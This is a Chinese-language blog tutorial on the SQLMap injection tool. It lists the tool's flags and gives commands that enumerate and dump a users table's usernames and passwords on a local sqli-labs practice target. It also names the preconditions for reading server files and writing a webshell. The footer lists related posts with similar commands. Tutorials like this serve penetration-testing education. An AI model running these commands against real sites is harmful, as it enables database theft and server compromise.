神器SQLmap实战详解

已于 2024-04-07 10:28:13 修改
阅读量367 收藏 4
点赞数 1
分类专栏: 渗透测试 文章标签: 安全 网络安全
于 2024-04-07 10:24:13 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Sgirll/article/details/137454654
版权

免责声明

文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行负责。如有侵权烦请告知,我会立即删除并致歉。谢谢!

前言:在当今互联网时代,网络安全已成为各大组织不可忽视的重要议题。SQL注入攻击作为一种历史悠久且影响深远的网络攻击方式,它利用了Web应用程序与数据库交互时的安全漏洞,对数据安全构成了严重威胁。本文将以SQLMap工具为核心,深入探讨SQL注入的原理、检测、利用及防御策略,旨在为网络安全研究人员、渗透测试人员提供实用指南。

一、SQLMap工具介绍

SQLMap是一款开源的自动化SQL注入测试工具,它能够检测和利用Web应用中的SQL注入漏洞。凭借其强大的功能和易用性,SQLMap已经成为安全研究人员和渗透测试人员的首选工具之一。

二、SQLMap使用

1. 下载与安装

您可以从SQLMap的官方网站或GitHub页面上获取最新版本的源代码。

https://github.com/sqlmapproject/sqlmap

 2. SQLMap常用参数和功能:

sqlmap -r 1.txt --dbs -level=3 -risk=3 --batch -p "id" --proxy http://127.0.0.1:8080
-u:指定目标 URL,可以是 HTTP 或 HTTPS 协议。-d:连接数据库。--dbs:列出所有数据库。--current-db:列出当前数据库。--tables:列出当前表。--columns:列出当前列。-D:选择使用的数据库。-T:选择使用的表。-C:选择使用的列。--dump:获取字段中的数据。--dump-all:拖库操作。--batch:自动选择 yes 选项。--smart:启发式快速判断,节省时间。--forms:尝试使用 POST 注入。-r:加载本地保存的 HTTP 请求文件(txt 文件)。-l:加载本地保存的 HTTP 请求文件(日志文件)。-g:自动获取 Google 搜索的前 100 个结果,并测试带有 GET 参数的 URL。-o:开启所有默认性能优化。--tamper:调用脚本进行注入。-v:指定 SQLMap 的回显等级。--delay:设置访问间隔时间。--os-shell:获取主机 shell,权限通常较低。-m:批量操作。-c:指定配置文件执行操作。--data:将指定数据作为 POST 数据提交。--timeout:设置超时时间。--level:设置注入探测等级。--is-dba:判断当前用户是否为数据库管理员权限。--risk:设置风险等级。--identify-waf:检测防火墙类型。--param-del="分割符":设置参数分隔符。--skip-urlencode:不进行 URL 编码。--keep-alive:设置持久连接,加快探测速度。--null-connection:检索没有 body 响应内容,用于盲注。--thread:设置最大线程数。--safe-url:避免被服务器屏蔽请求。--technique:指定注入类型。--tamper:调用脚本进行处理。-v ["x"]:指定回显信息的复杂程度。

三、SQL注入自动化实战演练

靶场页面:

1.读取数据库名

python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" --dbs --batch

2.读取表名

python sqlmap.py -u "http://127.0.0.1/targetrange/sqli-labs-master/Less-1/?id=1" -D "security" --tables --batch

3.读取字段名

python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" -D "security" -T "users" --columns --batch

4.读取数据

python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" -D "security" -T "users" -C "username,password" --dump --batch

.SQLmap读取目标系统文件

满足条件

(1)当前sql注入用户必须为DBA权限(--is-dba为true)(2)需要知道网站的绝对路径(3)My.ini文件中的这项配置secure_file_priv=””为空

.通过SQLmap写入webshell

满足条件:

(1)当前sql注入用户必须为DBA权限(--is-dba为true)(2)需要知道网站的绝对路径(3)My.ini文件中的这项配置secure_file_priv=””为空

结语:SQL注入攻击仍然是网络安全领域面临的重大威胁之一。通过学习和使用像SQLMap这样的工具,我们不仅能够更好地理解SQL注入的原理和攻击手法,还能够加强我们的应用程序和数据库的安全防护。记住,防御始于深入理解攻击技术,持续的学习和实践是提升网络安全防护能力的关键。

Adler学安全
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
Sqlmap 实验
wangjingder803的博客
03-17 170
点击文件在这里打开终端,输入sqlmap -r 1.txt --data=id --batch(-r参数是指定一个文件,-data是指定我们要进行sql注入的参数,-batch意思是选择默认参数)使用sqlmap -r 123.txt --data=id --batch -D dvwa -T users –dump语句能查看所有users表中内容。#创建一个1.txt文件,将获取的数据复制进去(在本机创建后复制到虚拟机内)获得user表,再通过下面命令列出dvwa数据库下,users表中的列名。
Sqlmap实验
ch258563的博客
03-17 96
Sqlmap实验
渗透测试——SQL注入实验(Sqlmap
YT的博客
02-11 6271
实验环境 本实验中,OWASP Web服务器靶机(10.10.10.129,对外公开域名:www.dvssc.com)含有 SQL注入漏洞,在攻击机 BT5 R1 (10.10.10.128)上通过工具进行攻击。 工具:sqlmap、Firefox浏览器内置的 Tamper Data 1. 输入 www.dvssc.com (或10.10.10.129) 登录要攻击的网站,点击登录界面 2....
信息系统安全实验之SQLMap工具使用综合实验
7xun's space
04-18 513
切换到PC1的命令行的相应目录下,输入“python sqlmap.py -u "http:// 192.168.161.135/ry.php?ry_id=1"”,其中“-u”参数用于指定注入点的URL。(2)根据SQL注入的原理,可以得到一种防范方法,就是对构成网站的目录中(在实验中该目录为C:/code/sql)的相关php文件(比如ry.php)进行修改,这样可以使得SQLMap无法检测到注入点。(1)在本次实验中,我注意到:注入点已经提前给出,而如果注入点没有给出的话,就需要我们手动寻找注入点。
初学sqlmap 实验吧wp
Daniel的博客
06-30 471
初次接触sqlmap。 首先判断是否存在注入点,先在网址后加'。 然后 可以判断存在注入点。然后就可以使用sqlmap。首先查看当前数据库。 发现数据库名为my_db;然后爆表名。 继续爆thiskey表的列。 接着爆 拿到key。
ibatis sqlmap配置详解
01-09
SqlMap的配置是iBatis中应用的核心。这部分任务占据了iBatis开发的70的工作量。Sql Map配置文件是iBatis配置的核心,从数据库连接到执行SQL时使用的sqlMap文件都是通过此文件中的配置提供给框架的,它通常命名为...
注入神器sqlmap
11-11
自从我拥有了sqlmap 我再也不需要其他注入工具了 感觉他真是万能的 和burpsuit一起用没有什么过不了
渗透测试必备神器SQLMAP的所有绕waf脚本合集
最新发布
10-18
SQLMAP利用这一点,通过构造特定的SQL语句,绕过防火墙的检测,直达数据库。 具体来说,SQLMAP首先会尝试猜测应用程序所使用的数据库类型(如MySQL、Oracle等),然后根据该数据库类型的语法和特性,构造出特定的...
万能注入神器sqlmap
04-26
万能注入神器sqlmap,进行SQL注入攻击测试的神器,软件安全SQL注入扫描神器,方便好用的万能注入神器,用过才知道
SQLMAP2018版本中文详解
05-13
sqlmap命令中文详解,2018.5.13更新 sqlmap命令中文详解,2018.5.13更新 sqlmap命令中文详解,2018.5.13更新 sqlmap命令中文详解,2018.5.13更新 sqlmap命令中文详解,2018.5.13更新
实验20:sqlmap工具使用入门及案例介绍
qq_44720671的博客
04-15 231
sqlmap工具使用入门 我之前写过一篇sqlmap的基本入门,那个是以墨者学院的靶场为例,这里我们用pikachu重新演示一下。 打开sqlmap和pikachu的字符型注入。 在pikachu的输入框中随意输入数字,使其出现注入点 在sqlmap中输入python sqlmap.py -u “http://127.0.0.1/pikachu/vul/sqli/sqli_str.php?n...
渗透测试-SQL注入之sqlmap的使用方法及实战案例
lza20001103的博客
07-19 3653
渗透测试-SQL注入之sqlmap的使用方法及实战案例
网络渗透测试实验3:SQL注入(DVWA+SQLmap+Mysql注入实战
zzzfff__的博客
11-21 1627
实验环境搭建。启动Metasploitable2虚拟机。1.输入账号密码【msfadmin】,输入【ip a】查询ip2.打开浏览器,输入该ip,进入DVWA输入账号密码:admin,password。账号密码使用nmap穷举,见我的另一篇博客3.注入点发现。首先肯定是要判断是否有注入漏洞。在输入框输入1,返回ID: 1返回正常;
SQLMAP注入教程-11种常见SQLMAP使用方法详解
dfdhxb995397的博客
08-24 3999
sqlmap也是渗透中常用的一个注入工具,其实在注入工具方面,一个sqlmap就足够用了,只要你用的熟,秒杀各种工具,只是一个便捷性问题,sql注入另一方面就是手工党了,这个就另当别论了。今天把我一直以来整理的sqlmap笔记发布上来供大家参考。 一共有11种常见SQLmap使用方法:一、SQLMAP用于Access数据库注入(1) 猜解是否能注入 ...
渗透测试---手把手教你sqlmap数据库注入测试(1)---靶场实战
weixin_52796034的博客
10-14 2452
SQLMap,就像它的名字所暗示的,是一个为我们提供方便的“SQL注入攻击”的工具。对于那些不熟悉这个概念的人来说,SQL注入是一种黑客攻击技术,允许攻击者在目标网站的数据库中执行恶意SQL语句。这意味着我们可以控制和操纵网站的数据,甚至可以完全接管整个网站。那么SQLMap如何帮助我们实现这些呢?
SQLMAP基本应用详解实战演示)
刘桂香263的博客
07-31 4633
SQLMAP自动化注入工具具有扫描、发现并利用给定的URL的SQL漏洞。
sqlmap详细教程
简介
01-04 3105
SQLmqp教程!
【史上最全sqlmap通关sqli-labs靶场教程】
DMXA的博客
10-15 2610
【史上最全sqlmap通关sqli-labs靶场教程】
sqlmap代码详解
07-27
sqlmap是一款用于自动化SQL注入的工具。下面是对引用内容的解释: 引用\[1\]中的代码是使用sqlmap进行数据库表名的获取。其中,-u参数指定了目标URL,--level参数指定了注入的深度,--smart参数启用了智能检测,--dbms参数指定了数据库管理系统为MySQL,-D参数指定了要操作的数据库名。 引用\[2\]中的代码是使用sqlmap执行SQL查询。其中,-u参数指定了目标URL,--sql-query参数指定了要执行的SQL查询语句,-v参数指定了详细程度为1。 引用\[3\]中的代码是使用sqlmap进行数据库名的获取,并将结果保存到日志文件中。其中,-u参数指定了目标URL,--level参数指定了注入的深度,--smart参数启用了智能检测,--dbms参数指定了数据库管理系统为MySQL,--dbs参数指定了要获取数据库名,-o参数指定了保存日志的文件名,--resume参数用于恢复已保存的进度。 综上所述,sqlmap是一款功能强大的工具,可以用于自动化地进行SQL注入攻击,并提供了丰富的参数和选项来满足不同的需求。 #### 引用[.reference_title] - *1* *2* *3* [sqlmap命令详解(最全版本)](https://blog.csdn.net/lkbzhj/article/details/126569453)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Adler学安全

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值